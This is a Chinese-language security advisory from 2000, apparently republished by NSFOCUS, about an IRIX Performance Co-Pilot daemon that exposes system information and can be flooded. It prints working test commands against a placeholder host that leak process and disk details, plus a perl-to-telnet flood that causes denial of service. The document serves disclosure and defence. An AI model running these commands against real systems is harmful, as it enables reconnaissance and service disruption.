首页 -> 安全研究

安全研究

安全漏洞
IRIX 6.5 Performance Copilot 泄漏系统信息漏洞

发布日期:2000-04-14
更新日期:2000-04-15

受影响系统:
pcp_eoe Performance Co-Pilot v2.1
+
  IRIX 6.2, 6.3, 6.4 或者 6.5.5
描述:

IRIX 6.5.6缺省安装了一个软件"Performance Copilot" (PCP),这个软件用来收集系统性
能信息并设法进行分析。它包含一个守护进程程序,缺省是在/usr/etc/pmcd下面,这个程序
会监听4321端口,应答PCP用户发来的请求,提供系统信息资料。不幸的是,缺省情况下它
并没有做访问控制,因此任意远程用户都可以通过发送请求命令,获取系统的敏感信息,例
如: ps -elf,df等等。 另外它在接受大量数据包时,会占用大量系统资源,可能导致拒绝服
务攻击。


<* 来源:Marcelo Magnasco (mgnsclb@ROCKVAX.ROCKEFELLER.EDU) *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

% pminfo -f -h sgi.victim.com filesys.mountdir

这个命令将列出所有磁盘以及它们的mount路径信息


% pmem -h sgi.victim.com

这个命令将会返回类似ps -elf产生的信息:包括所有进程名,参数以及属主名

% pminfo -f -h sgi.victim.com swap

这个命令将会告诉你系统swap使用情况

% perl -e 'print " a" x 92834244,"\n";'' | telnet sgi.victim.com 4321

这个命令将会使pmcd进程占用大量内存/硬盘空间,直到按ctrl_c中止连接。
这可能能导致远程系统的拒绝服务攻击。


建议:

IRIX正在着手进行修复工作。
临时解决方法是:
在/etc/pmcd.conf中增加下列几条配置语句,以限制外部访问此进程:

[access]
allow localhost: all ;
disallow * : all;



浏览次数:8029
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障